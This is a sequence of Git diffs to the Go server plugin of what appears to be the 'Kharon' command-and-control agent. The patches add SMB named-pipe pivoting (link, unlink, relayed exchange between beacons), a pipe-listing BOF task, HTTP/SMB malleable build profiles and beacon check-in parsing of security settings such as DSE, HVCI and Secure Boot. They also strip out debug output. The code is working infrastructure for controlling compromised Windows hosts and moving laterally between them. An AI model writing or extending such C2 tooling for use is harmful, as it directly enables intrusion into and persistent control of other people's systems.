-											originalUUID := string(childData[:8])
-											_ = ts.TsExtenderDataSave("kharon_pivot_map", childAgentId, []byte(originalUUID))
+											PivotUUIDMap[childAgentId] = string(childData[:8])
 										}
 
 										err = ts.TsPivotCreate(task.TaskId, agentData.Id, childAgentId, "", false)

--- a/agent_kharon/src_server/pl_agent.go
+++ b/agent_kharon/src_server/pl_agent.go
@@ -618,16 +618,9 @@ func CreateAgent(initialData []byte) (ax.AgentData, ax.ExtenderAgent, error) {
 		khcfg KharonData
 	)
 
-	fmt.Println("=== DEBUG RAW DATA ===")
-	fmt.Printf("Total bytes received: %d\n", len(initialData))
-	fmt.Printf("Hex dump:\n%s", hex.Dump(initialData))
-	fmt.Printf("\n")
-	fmt.Println("======================")
-
 	packer := CreatePacker(initialData)
 
 	command := packer.ParseInt8()
-	fmt.Printf("Command: 0x%x\n", command)
 	if command != 0xf1 {
 		return agent, ModuleObject.ext, errors.New("error agent checkin data")
 	}
@@ -822,19 +815,17 @@ func CreateAgent(initialData []byte) (ax.AgentData, ax.ExtenderAgent, error) {
 	fmt.Printf("VBS/HVCI Status: %v\n", khcfg.Machine.VbsHvci)
 
 	khcfg.Machine.DseStatus = uint32(packer.ParseInt32())
-	fmt.Printf("DSE Status: %v\n", khcfg.Machine.DseStatus)
 
 	khcfg.Machine.TestsignEnabled = packer.ParseInt32() != 0
 	fmt.Printf("Test Signing Enabled: %v\n", khcfg.Machine.TestsignEnabled)
 
 	khcfg.Machine.DebugmodeEnabled = packer.ParseInt32() != 0
-	fmt.Printf("Debug Mode Enabled: %v\n", khcfg.Machine.DebugmodeEnabled)
-
 	khcfg.Machine.SecurebootEnabled = packer.ParseInt32() != 0
-	fmt.Printf("Secure Boot Enabled: %v\n", khcfg.Machine.SecurebootEnabled)
 
 	key := packer.ParseBytes()
-	fmt.Printf("Session Key: %v\n", key)
+
+	// SMB pipe name (empty for HTTP beacons)
+	khcfg.PipeName = packer.ParseString()
 
 	process := ConvertCpToUTF8(khcfg.Session.ImgPath, int(khcfg.Session.Acp))
 	if strings.Contains(process, "\\") {
@@ -2028,38 +2019,30 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 	}
 
 	taskCount := packer.ParseInt32()
-	fmt.Printf("[PTR-DBG] ProcessTasksResult: agent=%s, taskCount=%d, packerSize=%d\n", agentData.Id, taskCount, packer.Size())
-
 	for taskIndex := uint(0); taskIndex < taskCount && packer.CheckPacker([]string{"int"}); taskIndex++ {
 		dataType := packer.ParseInt32()
-		fmt.Printf("[PTR-DBG]   task[%d]: dataType=0x%x, remaining=%d\n", taskIndex, dataType, packer.Size())
 
 		if dataType == uint(MSG_QUICK) || dataType == uint(MSG_OUT) {
 			if len(packer.buffer) < 16 {
-				fmt.Printf("[PTR-DBG]   MSG_QUICK: buffer too small (%d)\n", len(packer.buffer))
 				return outTasks
 			}
 
 			TaskUID := string(packer.ParsePad(36))
 			if len(TaskUID) < 8 {
-				fmt.Printf("[PTR-DBG]   MSG_QUICK: TaskUID too short\n")
 				return outTasks
 			}
 			task := taskData
 			task.TaskId = TaskUID[:8]
-			fmt.Printf("[PTR-DBG]   MSG_QUICK: TaskId=%s, remaining=%d\n", task.TaskId, packer.Size())
 
 			if dataType == 0x7 && packer.CheckPacker([]string{"int"}) {
 				packer.ParseInt32()
 			}
 
 			if false == packer.CheckPacker([]string{"int", "array"}) {
-				fmt.Printf("[PTR-DBG]   MSG_QUICK: CheckPacker(int,array) FAILED, remaining=%d\n", packer.Size())
 				return outTasks
 			}
 
 			outputType := packer.ParseInt32()
-			fmt.Printf("[PTR-DBG]   MSG_QUICK: outputType=%d\n", outputType)
 
 			switch outputType {
 			case CALLBACK_ERROR:
@@ -2142,15 +2125,12 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 			outTasks = append(outTasks, task)
 
 		} else if dataType == uint(PROFILE_WEB) || dataType == uint(PROFILE_SMB) { // web || smb
-			fmt.Printf("[PTR-DBG]   PROFILE_SMB/WEB entry, checking array...\n")
 
 			if false == packer.CheckPacker([]string{"array"}) {
-				fmt.Printf("[PTR-DBG]   CheckPacker(array) FAILED, remaining=%d\n", packer.Size())
 				return outTasks
 			}
 
 			innerBytes := packer.ParseBytes()
-			fmt.Printf("[PTR-DBG]   inner bytes=%d\n", len(innerBytes))
 			cmd_packer := CreatePacker(innerBytes)
 			if cmd_packer.CheckPacker([]string{"array", "word"}) {
 
@@ -2162,7 +2142,6 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 				task.TaskId = TaskUID[:8]
 
 				commandId := int16(cmd_packer.ParseInt16())
-				fmt.Printf("[PTR-DBG]   PROFILE_SMB: TaskUID=%s, commandId=%d\n", task.TaskId, commandId)
 					switch commandId {
 
 				case TASK_JOB:
@@ -2883,7 +2862,6 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 										// but CreateAgent assigns a random agent ID. Exchange needs the original.
 										if len(childData) >= 8 {
 											PivotUUIDMap[childAgentId] = string(childData[:8])
-											fmt.Printf("[PIVOT-DBG] PivotUUIDMap[%s] = %s\n", childAgentId, string(childData[:8]))
 										}
 
 										actualParent := agentData.Id
@@ -2891,13 +2869,8 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 											actualParent = owner
 											delete(TaskOwnerMap, task.TaskId)
 										}
-										fmt.Printf("[PIVOT-DBG] TsPivotCreate: parent=%s, child=%s (agentData=%s, taskId=%s)\n",
-											actualParent, childAgentId, agentData.Id, task.TaskId)
-
 										err = ts.TsPivotCreate(task.TaskId, actualParent, childAgentId, "", false)
-										if err != nil {
-											fmt.Printf("[PIVOT-DBG] TsPivotCreate ERROR: %v\n", err)
-										}
+										_ = err
 
 										task.Message = fmt.Sprintf("----- New SMB pivot agent: [%s]===[%s] -----", actualParent, childAgentId)
 										task.MessageType = MESSAGE_SUCCESS

--- a/agent_kharon/src_server/pl_agent.go
+++ b/agent_kharon/src_server/pl_agent.go
@@ -1909,6 +1909,22 @@ func CreateTask(ts Teamserver, agent ax.AgentData, args map[string]any) (ax.Task
 			array = []interface{}{TASK_POSTEX, POSTEX_ACTION_INJECT, len(bofData), bofData, len(bofArgs), bofArgs}
 		}
 
+	case "list_pipe":
+		filter := ""
+		if f, ok := args["filter"].(string); ok {
+			filter = f
+		}
+		bofData, err = LoadExtModule("src_core", "list_pipe", "x64")
+		if err != nil {
+			goto RET
+		}
+		bofParam, err = PackExtData(PackExtDataWChar(filter, agent.ACP))
+		if err != nil {
+			goto RET
+		}
+		array = []interface{}{TASK_EXEC_BOF, len(bofData), bofData, PIPE_LIST, len(bofParam), bofParam}
+		messageData.Text = fmt.Sprintf("Listing pipes matching: *%s*", filter)
+
 	case "link":
 		switch subcommand {
 		case "smb":

--- a/agent_kharon/src_server/pl_agent.go
+++ b/agent_kharon/src_server/pl_agent.go
@@ -2860,6 +2860,14 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 										task.Message = fmt.Sprintf("Link failed: %v", err)
 										task.MessageType = MESSAGE_ERROR
 									} else {
+										// Store mapping: serverAgentId → original UUID prefix from checkin blob.
+										// The beacon identifies children by SmbUUID (first 8 chars of checkin UUID),
+										// but the server assigns a random agent ID. Exchange needs the original.
+										if len(childData) >= 8 {
+											originalUUID := string(childData[:8])
+											_ = ts.TsExtenderDataSave("kharon_pivot_map", childAgentId, []byte(originalUUID))
+										}
+
 										err = ts.TsPivotCreate(task.TaskId, agentData.Id, childAgentId, "", false)
 										_ = err
 

--- a/agent_kharon/src_server/pl_agent.go
+++ b/agent_kharon/src_server/pl_agent.go
@@ -29,30 +29,6 @@ func AgentGenerateProfile(agentConfig string, listenerWM string, listenerMap map
 
 	/// START CODE
 
-	fmt.Printf("=== AgentGenerateProfile ===\n")
-	fmt.Printf("agentConfig: %s\n", agentConfig)
-	fmt.Printf("listenerWM: %s\n", listenerWM)
-
-	// Print listenerMap detalhadamente
-	fmt.Printf("listenerMap (%d items):\n", len(listenerMap))
-	for key, value := range listenerMap {
-		switch v := value.(type) {
-		case string:
-			fmt.Printf("  [%s] = %s\n", key, v)
-		case int, int32, int64:
-			fmt.Printf("  [%s] = %d\n", key, v)
-		case bool:
-			fmt.Printf("  [%s] = %t\n", key, v)
-		case []byte:
-			fmt.Printf("  [%s] = []byte (length: %d)\n", key, len(v))
-		case map[string]any:
-			fmt.Printf("  [%s] = map[string]any (%d items)\n", key, len(v))
-		default:
-			fmt.Printf("  [%s] = %v (type: %T)\n", key, v, v)
-		}
-	}
-	fmt.Printf("============================\n")
-
 	/// END CODE
 	return nil, nil
 }
@@ -69,22 +45,37 @@ func AgentGenerateBuild(agentConfig string, agentProfile []byte, listenerMap map
 		return nil, "", fmt.Errorf("failed to parse agentConfig: %v", err)
 	}
 
-	decoded, err := base64.StdEncoding.DecodeString(fmt.Sprint(listenerMap["uploaded_file"]))
-	if err != nil {
-		fmt.Printf("ERROR: failed decode base64: %v\n", err)
-		return nil, "", err
+	// Detect protocol from listener profile
+	protocol := ""
+	if p, ok := listenerMap["protocol"].(string); ok {
+		protocol = p
 	}
-	malleable_str := string(decoded)
-	fmt.Printf("DEBUG: Malleable profile decoded (%d bytes)\n", len(malleable_str))
+	isSMB := (protocol == "bind_smb")
+	fmt.Printf("DEBUG: Protocol: %s (isSMB: %v)\n", protocol, isSMB)
 
-	// Build malleable HTTP bytes
-	malleableBytes, callbackCount, err := BuildMalleableHTTPBytes(malleable_str)
-	if err != nil {
-		fmt.Printf("ERROR: Failed to build malleable HTTP bytes: %v\n", err)
-		return nil, "", err
+	var malleableBytes []byte
+	var callbackCount int
+
+	if !isSMB {
+		decoded, err := base64.StdEncoding.DecodeString(fmt.Sprint(listenerMap["uploaded_file"]))
+		if err != nil {
+			fmt.Printf("ERROR: failed decode base64: %v\n", err)
+			return nil, "", err
+		}
+		malleable_str := string(decoded)
+		fmt.Printf("DEBUG: Malleable profile decoded (%d bytes)\n", len(malleable_str))
+
+		// Build malleable HTTP bytes
+		malleableBytes, callbackCount, err = BuildMalleableHTTPBytes(malleable_str)
+		if err != nil {
+			fmt.Printf("ERROR: Failed to build malleable HTTP bytes: %v\n", err)
+			return nil, "", err
+		}
+		fmt.Printf("DEBUG: Malleable bytes generated (%d bytes)\n", len(malleableBytes))
+		fmt.Printf("DEBUG: HTTP Callback count: %d\n", callbackCount)
+	} else {
+		fmt.Println("DEBUG: SMB profile — skipping malleable HTTP parsing")
 	}
-	fmt.Printf("DEBUG: Malleable bytes generated (%d bytes)\n", len(malleableBytes))
-	fmt.Printf("DEBUG: HTTP Callback count: %d\n", callbackCount)
 
 	// Get working directory
 	wd, err := os.Getwd()
@@ -269,10 +260,34 @@ func AgentGenerateBuild(agentConfig string, agentProfile []byte, listenerMap map
 		fmt.Sprintf("KH_SPAWNTO_X64=%s", spawnto),
 
 		fmt.Sprintf("KH_BOF_HOOK_ENABLED=%d", bool_to_int(cfg.BofApiProxy)),
+	}
 
-		// Malleable HTTP bytes como array C entre aspas
-		fmt.Sprintf("HTTP_MALLEABLE_BYTES=\"%s\"", bytes_to_hexstr(malleableBytes)),
-		fmt.Sprintf("HTTP_CALLBACK_COUNT=%d", callbackCount),
+	// Profile-specific make variables
+	if isSMB {
+		// SMB profile: set PROFILE_C2 and pipe name, use dummy HTTP values
+		pipename := fmt.Sprint(listenerMap["pipename"])
+		if pipename == "<nil>" || pipename == "" {
+			pipename = "kharon_c2"
+		}
+		// Build pipe path and convert to C byte array (avoids Make/Shell escaping issues)
+		pipePath := fmt.Sprintf("\\\\.\\pipe\\%s", pipename)
+		pipeBytes := append([]byte(pipePath), 0x00) // null-terminated
+		smbPipeHex := bytes_to_hexstr(pipeBytes)
+
+		makeVars = append(makeVars,
+			"PROFILE_C2=0x15",
+			fmt.Sprintf("SMB_PIPE_NAME=\"%s\"", smbPipeHex),
+			"HTTP_MALLEABLE_BYTES=\"{0x00}\"",
+			"HTTP_CALLBACK_COUNT=0",
+		)
+		fmt.Printf("DEBUG: SMB pipe path: %s\n", pipePath)
+		fmt.Printf("DEBUG: SMB pipe hex: %s\n", smbPipeHex)
+	} else {
+		// HTTP profile: malleable bytes
+		makeVars = append(makeVars,
+			fmt.Sprintf("HTTP_MALLEABLE_BYTES=\"%s\"", bytes_to_hexstr(malleableBytes)),
+			fmt.Sprintf("HTTP_CALLBACK_COUNT=%d", callbackCount),
+		)
 	}
 
 	// Guardrails
@@ -900,9 +915,17 @@ func PackPivotTasks(pivotId string, data []byte) ([]byte, error) {
 
 	/// START CODE
 
+	// TASK_PIVOT (int16=21) as command ID so Jobs::Create routes to Task::Pivot
+	// SubCmd int8=20 (Action::Pivot::Exchange) to trigger relay
+	array := []interface{}{TASK_PIVOT, int8(20), pivotId, len(data), data}
+	packData, err := PackArray(array)
+	if err != nil {
+		return nil, err
+	}
+
 	/// END CODE
 
-	return data, nil
+	return packData, nil
 }
 
 func CreateTask(ts Teamserver, agent ax.AgentData, args map[string]any) (ax.TaskData, ax.ConsoleMessageData, error) {
@@ -1895,6 +1918,46 @@ func CreateTask(ts Teamserver, agent ax.AgentData, args map[string]any) (ax.Task
 			array = []interface{}{TASK_POSTEX, POSTEX_ACTION_INJECT, len(bofData), bofData, len(bofArgs), bofArgs}
 		}
 
+	case "link":
+		switch subcommand {
+		case "smb":
+			target, ok := args["target"].(string)
+			if !ok || target == "" {
+				err = errors.New("parameter 'target' is required")
+				goto RET
+			}
+			pipename, ok := args["pipename"].(string)
+			if !ok || pipename == "" {
+				err = errors.New("parameter 'pipename' is required")
+				goto RET
+			}
+
+			// Build the full pipe path: \\target\pipe\pipename
+			fullPipePath := fmt.Sprintf("\\\\%s\\pipe\\%s", target, pipename)
+
+			// Action::Pivot::Link = 10 (beacon-side enum)
+			// CmdID is read as Int16 by Jobs::Create (line 34 of Jobs.cc)
+			array = []interface{}{TASK_PIVOT, int8(10), fullPipePath}
+
+			messageData.Text = fmt.Sprintf("Linking to SMB pipe: %s", fullPipePath)
+
+		default:
+			err = fmt.Errorf("unknown link subcommand: '%s'", subcommand)
+			goto RET
+		}
+
+	case "unlink":
+		agentID, ok := args["agent_id"].(string)
+		if !ok || agentID == "" {
+			err = errors.New("parameter 'agent_id' is required")
+			goto RET
+		}
+
+		// Action::Pivot::Unlink = 11 (beacon-side enum)
+		array = []interface{}{TASK_PIVOT, int8(11), agentID}
+
+		messageData.Text = fmt.Sprintf("Unlinking agent: %s", agentID)
+
 	default:
 		err = errors.New(fmt.Sprintf("Command '%v' not found", command))
 		goto RET
@@ -1905,10 +1968,7 @@ func CreateTask(ts Teamserver, agent ax.AgentData, args map[string]any) (ax.Task
 		goto RET
 	}
 
-	fmt.Printf("tasking command: %s | sub command: %s\n", command, subcommand)
-
 RET:
-	fmt.Printf("err %v\n", err)
 
 	return taskData, messageData, err
 }
@@ -1923,14 +1983,41 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 
 	packer := CreatePacker(packedData)
 
-	// Print packedData
-	// fmt.Printf("=== PACKED DATA DEBUG ===\n")
-	// fmt.Printf("Total bytes: %d\n", len(packedData))
-	// fmt.Printf("Hex dump:\n%s", hex.Dump(packedData))
-	// fmt.Printf("Raw hex: %x\n", packedData)
-	// fmt.Printf("========================\n\n")
-
 	if false == packer.CheckPacker([]string{"int"}) {
+		return outTasks
+	}
+
+	// Check if data starts with MSG_QUICK (0x05) or MSG_OUT (0x07)
+	// Format: [1B type][36B raw TaskUUID][4B callbackType][4B+N string message]
+	if len(packedData) > 41 && (packedData[0] == 0x05 || packedData[0] == 0x07) {
+		msgType := packedData[0]
+		taskUUID := string(packedData[1:37]) // raw 36 bytes, NOT length-prefixed
+		_ = msgType
+
+		task := taskData
+		if len(taskUUID) >= 8 {
+			task.TaskId = taskUUID[:8]
+		}
+
+		// Read callback type (4 bytes BIG ENDIAN at offset 37)
+		remaining := packedData[37:]
+		if len(remaining) >= 4 {
+			callbackType := uint32(remaining[0])<<24 | uint32(remaining[1])<<16 | uint32(remaining[2])<<8 | uint32(remaining[3])
+			remaining = remaining[4:]
+
+			// Read message string (length-prefixed BIG ENDIAN: [4B len][chars])
+			if len(remaining) >= 4 {
+				msgLen := uint32(remaining[0])<<24 | uint32(remaining[1])<<16 | uint32(remaining[2])<<8 | uint32(remaining[3])
+				remaining = remaining[4:]
+				if uint32(len(remaining)) >= msgLen && msgLen > 0 {
+					output := string(remaining[:msgLen])
+					task.ClearText = ConvertCpToUTF8(output, agentData.ACP)
+					task.MessageType = MESSAGE_SUCCESS
+					task.Completed = false
+					outTasks = append(outTasks, task)
+				}
+			}
+		}
 		return outTasks
 	}
 
@@ -2058,7 +2145,7 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 				task.TaskId = TaskUID[:8]
 
 				commandId := int16(cmd_packer.ParseInt16())
-				switch commandId {
+					switch commandId {
 
 				case TASK_JOB:
 					jobCount := cmd_packer.ParseInt32()
@@ -2730,12 +2817,6 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 								datalen := cmd_packer.ParseInt32()
 
 								fmt.Printf("COMMAND_TUNNEL_WRITE_TCP: DATA LEN: %d\n", datalen)
-								// Print packedData
-								fmt.Printf("=== PACKED DATA DEBUG ===\n")
-								fmt.Printf("Total bytes: %d\n", len(data))
-								fmt.Printf("Hex dump:\n%s", hex.Dump(data))
-								fmt.Printf("Raw hex: %x\n", data)
-								fmt.Printf("========================\n\n")
 								ts.TsTunnelConnectionData(int(channelID), data)
 							}
 						}
@@ -2759,6 +2840,46 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 								task.MessageType = MESSAGE_ERROR
 							} else {
 								task.MessageType = MESSAGE_SUCCESS
+							}
+						}
+					}
+
+				case TASK_PIVOT:
+					if cmd_packer.CheckPacker([]string{"byte"}) {
+						pivotSubCmd := int(cmd_packer.ParseInt8())
+
+						switch pivotSubCmd {
+						case 10: // Action::Pivot::Link
+							if cmd_packer.CheckPacker([]string{"int", "array"}) {
+								watermark := fmt.Sprintf("%08x", cmd_packer.ParseInt32())
+								childData := cmd_packer.ParseBytes()
+
+								if len(childData) > 0 {
+									childAgentId, err := ts.TsListenerInteralHandler(watermark, childData)
+									if err != nil {
+										task.Message = fmt.Sprintf("Link failed: %v", err)
+										task.MessageType = MESSAGE_ERROR
+									} else {
+										err = ts.TsPivotCreate(task.TaskId, agentData.Id, childAgentId, "", false)
+										_ = err
+
+										task.Message = fmt.Sprintf("----- New SMB pivot agent: [%s]===[%s] -----", agentData.Id, childAgentId)
+										task.MessageType = MESSAGE_SUCCESS
+									}
+								}
+							}
+						case 11: // Action::Pivot::Unlink
+							task.Message = "Child unlinked"
+							task.MessageType = MESSAGE_SUCCESS
+
+						case 20: // Action::Pivot::Exchange — child response relayed by parent
+							if cmd_packer.CheckPacker([]string{"int", "array"}) {
+								_ = cmd_packer.ParseInt32() // profileType
+								childResp := cmd_packer.ParseBytes()
+
+								if len(childResp) > 0 {
+									_, _ = ts.TsListenerInteralHandler("c17a905a", childResp)
+								}
 							}
 						}
 					}

--- a/agent_kharon/src_server/pl_agent.go
+++ b/agent_kharon/src_server/pl_agent.go
@@ -2910,34 +2910,13 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 
 						case 20: // Action::Pivot::Exchange — child response relayed by parent
 							if cmd_packer.CheckPacker([]string{"int", "array"}) {
-								profileType := cmd_packer.ParseInt32()
+								_ = cmd_packer.ParseInt32() // profileType
 								childResp := cmd_packer.ParseBytes()
 
-								dumpLen := len(childResp)
-								if dumpLen > 50 { dumpLen = 50 }
-								fmt.Printf("[EXCH-DBG] case20: profileType=0x%x, respLen=%d, first50=%x\n",
-									profileType, len(childResp), childResp[:dumpLen])
-
-								if len(childResp) >= 37 {
-									origPrefix := string(childResp[:8])
-									childAgentId := ""
-									for serverId, origUUID := range PivotUUIDMap {
-										if origUUID == origPrefix {
-											childAgentId = serverId
-											break
-										}
-									}
-									fmt.Printf("[EXCH-DBG] origPrefix='%s', childAgentId='%s'\n", origPrefix, childAgentId)
-
-									if childAgentId != "" {
-										taskPayload := childResp[37:]
-										fmt.Printf("[EXCH-DBG] taskPayload first8=%x (len=%d)\n", taskPayload[:min(8, len(taskPayload))], len(taskPayload))
-										_ = ts.TsAgentProcessData(childAgentId, taskPayload)
-										_ = ts.TsAgentSetTick(childAgentId, "")
-									} else {
-										// Fallback: try InternalHandler for checkins
-										_, _ = ts.TsListenerInteralHandler("c17a905a", childResp)
-									}
+								if len(childResp) > 0 {
+									// childResp is encrypted PostJobs from the child beacon.
+									// Use InternalHandler which decrypts with the child's stored key.
+									_, _ = ts.TsListenerInteralHandler("c17a905a", childResp)
 								}
 							}
 						}

--- a/agent_kharon/src_server/pl_agent.go
+++ b/agent_kharon/src_server/pl_agent.go
@@ -2871,21 +2871,23 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 										// but CreateAgent assigns a random agent ID. Exchange needs the original.
 										if len(childData) >= 8 {
 											PivotUUIDMap[childAgentId] = string(childData[:8])
+											fmt.Printf("[PIVOT-DBG] PivotUUIDMap[%s] = %s\n", childAgentId, string(childData[:8]))
 										}
 
-										// Determine actual parent: the agent that received the link task.
-									// When processing relayed PROFILE_SMB data, agentData is the outer
-									// HTTP parent — TaskOwnerMap has the real parent (the SMB child).
-									actualParent := agentData.Id
-									if owner, ok := TaskOwnerMap[task.TaskId]; ok {
-										actualParent = owner
-										delete(TaskOwnerMap, task.TaskId)
-									}
+										actualParent := agentData.Id
+										if owner, ok := TaskOwnerMap[task.TaskId]; ok {
+											actualParent = owner
+											delete(TaskOwnerMap, task.TaskId)
+										}
+										fmt.Printf("[PIVOT-DBG] TsPivotCreate: parent=%s, child=%s (agentData=%s, taskId=%s)\n",
+											actualParent, childAgentId, agentData.Id, task.TaskId)
 
-									err = ts.TsPivotCreate(task.TaskId, actualParent, childAgentId, "", false)
-									_ = err
+										err = ts.TsPivotCreate(task.TaskId, actualParent, childAgentId, "", false)
+										if err != nil {
+											fmt.Printf("[PIVOT-DBG] TsPivotCreate ERROR: %v\n", err)
+										}
 
-									task.Message = fmt.Sprintf("----- New SMB pivot agent: [%s]===[%s] -----", actualParent, childAgentId)
+										task.Message = fmt.Sprintf("----- New SMB pivot agent: [%s]===[%s] -----", actualParent, childAgentId)
 										task.MessageType = MESSAGE_SUCCESS
 									}
 								}

--- a/agent_kharon/src_server/pl_agent.go
+++ b/agent_kharon/src_server/pl_agent.go
@@ -1939,6 +1939,12 @@ func CreateTask(ts Teamserver, agent ax.AgentData, args map[string]any) (ax.Task
 			// CmdID is read as Int16 by Jobs::Create (line 34 of Jobs.cc)
 			array = []interface{}{TASK_PIVOT, int8(10), fullPipePath}
 
+			// Pre-generate TaskId so we can track which agent owns this link task.
+			// When the Link result comes back through a relayed PROFILE_SMB response,
+			// agentData is the outer HTTP parent — TaskOwnerMap lets us find the real parent.
+			taskData.TaskId = fmt.Sprintf("%08x", mrand.Uint32())
+			TaskOwnerMap[taskData.TaskId] = agent.Id
+
 			messageData.Text = fmt.Sprintf("Linking to SMB pipe: %s", fullPipePath)
 
 		default:
@@ -2867,10 +2873,19 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 											PivotUUIDMap[childAgentId] = string(childData[:8])
 										}
 
-										err = ts.TsPivotCreate(task.TaskId, agentData.Id, childAgentId, "", false)
-										_ = err
+										// Determine actual parent: the agent that received the link task.
+									// When processing relayed PROFILE_SMB data, agentData is the outer
+									// HTTP parent — TaskOwnerMap has the real parent (the SMB child).
+									actualParent := agentData.Id
+									if owner, ok := TaskOwnerMap[task.TaskId]; ok {
+										actualParent = owner
+										delete(TaskOwnerMap, task.TaskId)
+									}
 
-										task.Message = fmt.Sprintf("----- New SMB pivot agent: [%s]===[%s] -----", agentData.Id, childAgentId)
+									err = ts.TsPivotCreate(task.TaskId, actualParent, childAgentId, "", false)
+									_ = err
+
+									task.Message = fmt.Sprintf("----- New SMB pivot agent: [%s]===[%s] -----", actualParent, childAgentId)
 										task.MessageType = MESSAGE_SUCCESS
 									}
 								}

--- a/agent_kharon/src_server/pl_agent.go
+++ b/agent_kharon/src_server/pl_agent.go
@@ -2910,12 +2910,15 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 
 						case 20: // Action::Pivot::Exchange — child response relayed by parent
 							if cmd_packer.CheckPacker([]string{"int", "array"}) {
-								_ = cmd_packer.ParseInt32() // profileType
+								profileType := cmd_packer.ParseInt32()
 								childResp := cmd_packer.ParseBytes()
 
+								dumpLen := len(childResp)
+								if dumpLen > 50 { dumpLen = 50 }
+								fmt.Printf("[EXCH-DBG] case20: profileType=0x%x, respLen=%d, first50=%x\n",
+									profileType, len(childResp), childResp[:dumpLen])
+
 								if len(childResp) >= 37 {
-									// childResp = [36B child UUID][1B PostTask][4B taskCount][tasks...]
-									// Reverse-lookup PivotUUIDMap to find the server-assigned agent ID
 									origPrefix := string(childResp[:8])
 									childAgentId := ""
 									for serverId, origUUID := range PivotUUIDMap {
@@ -2924,11 +2927,16 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 											break
 										}
 									}
+									fmt.Printf("[EXCH-DBG] origPrefix='%s', childAgentId='%s'\n", origPrefix, childAgentId)
+
 									if childAgentId != "" {
-										// Strip UUID (36B) + PostTask byte (1B), pass raw task data
 										taskPayload := childResp[37:]
+										fmt.Printf("[EXCH-DBG] taskPayload first8=%x (len=%d)\n", taskPayload[:min(8, len(taskPayload))], len(taskPayload))
 										_ = ts.TsAgentProcessData(childAgentId, taskPayload)
 										_ = ts.TsAgentSetTick(childAgentId, "")
+									} else {
+										// Fallback: try InternalHandler for checkins
+										_, _ = ts.TsListenerInteralHandler("c17a905a", childResp)
 									}
 								}
 							}

--- a/agent_kharon/src_server/pl_agent.go
+++ b/agent_kharon/src_server/pl_agent.go
@@ -269,6 +269,7 @@ func AgentGenerateBuild(agentConfig string, agentProfile []byte, listenerMap map
 		if pipename == "<nil>" || pipename == "" {
 			pipename = "kharon_c2"
 		}
+		SmbPipeName = pipename // persist for CreateTask auto-resolution
 		// Build pipe path and convert to C byte array (avoids Make/Shell escaping issues)
 		pipePath := fmt.Sprintf("\\\\.\\pipe\\%s", pipename)
 		pipeBytes := append([]byte(pipePath), 0x00) // null-terminated
@@ -1933,10 +1934,9 @@ func CreateTask(ts Teamserver, agent ax.AgentData, args map[string]any) (ax.Task
 				err = errors.New("parameter 'target' is required")
 				goto RET
 			}
-			pipename, ok := args["pipename"].(string)
-			if !ok || pipename == "" {
-				err = errors.New("parameter 'pipename' is required")
-				goto RET
+			pipename, _ := args["pipename"].(string)
+			if pipename == "" {
+				pipename = SmbPipeName // auto-resolve from SMB listener config
 			}
 
 			// Build the full pipe path: \\target\pipe\pipename

--- a/agent_kharon/src_server/pl_agent.go
+++ b/agent_kharon/src_server/pl_agent.go
@@ -2913,8 +2913,23 @@ func ProcessTasksResult(ts Teamserver, agentData ax.AgentData, taskData ax.TaskD
 								_ = cmd_packer.ParseInt32() // profileType
 								childResp := cmd_packer.ParseBytes()
 
-								if len(childResp) > 0 {
-									_, _ = ts.TsListenerInteralHandler("c17a905a", childResp)
+								if len(childResp) >= 37 {
+									// childResp = [36B child UUID][1B PostTask][4B taskCount][tasks...]
+									// Reverse-lookup PivotUUIDMap to find the server-assigned agent ID
+									origPrefix := string(childResp[:8])
+									childAgentId := ""
+									for serverId, origUUID := range PivotUUIDMap {
+										if origUUID == origPrefix {
+											childAgentId = serverId
+											break
+										}
+									}
+									if childAgentId != "" {
+										// Strip UUID (36B) + PostTask byte (1B), pass raw task data
+										taskPayload := childResp[37:]
+										_ = ts.TsAgentProcessData(childAgentId, taskPayload)
+										_ = ts.TsAgentSetTick(childAgentId, "")
+									}
 								}
 							}
 						}

--- a/agent_kharon/src_server/pl_main.go
+++ b/agent_kharon/src_server/pl_main.go
@@ -4,7 +4,6 @@ import (
 	// "database/sql/driver"
 	"encoding/hex"
 	"encoding/json"
-	"fmt"
 	"io"
 	"math/rand"
 	"time"

--- a/agent_kharon/src_server/pl_main.go
+++ b/agent_kharon/src_server/pl_main.go
@@ -143,6 +143,10 @@ var (
 	ModuleObject   *ModuleExtender
 	ModuleDir      string
 	AgentWatermark string
+
+	// PivotUUIDMap maps server-assigned agentId → original beacon UUID prefix (first 8 chars).
+	// Needed because CreateAgent generates a random ID unrelated to the beacon's SmbUUID.
+	PivotUUIDMap = make(map[string]string)
 )
 
 func (p *PluginAgent) GetExtender() ax.ExtenderAgent {
@@ -225,14 +229,13 @@ func (ext *ExtenderAgent) PackTasks(agentData ax.AgentData, tasks []ax.TaskData)
 func (ext *ExtenderAgent) PivotPackData(pivotId string, data []byte) (ax.TaskData, error) {
 	// Resolve the beacon's original UUID from the pivot table.
 	// The beacon stores children by SmbUUID (first 8 chars of checkin UUID),
-	// but the server assigns a random agent ID. We stored the mapping at Link time.
+	// but CreateAgent assigns a random agent ID. We stored the mapping at Link time.
 	childId := pivotId
 	if ModuleObject != nil && ModuleObject.ts != nil {
 		_, _, cid := ModuleObject.ts.TsGetPivotInfoById(pivotId)
 		if cid != "" {
-			origUUID, err := ModuleObject.ts.TsExtenderDataLoad("kharon_pivot_map", cid)
-			if err == nil && len(origUUID) > 0 {
-				childId = string(origUUID)
+			if origUUID, ok := PivotUUIDMap[cid]; ok {
+				childId = origUUID
 			} else {
 				childId = cid
 			}

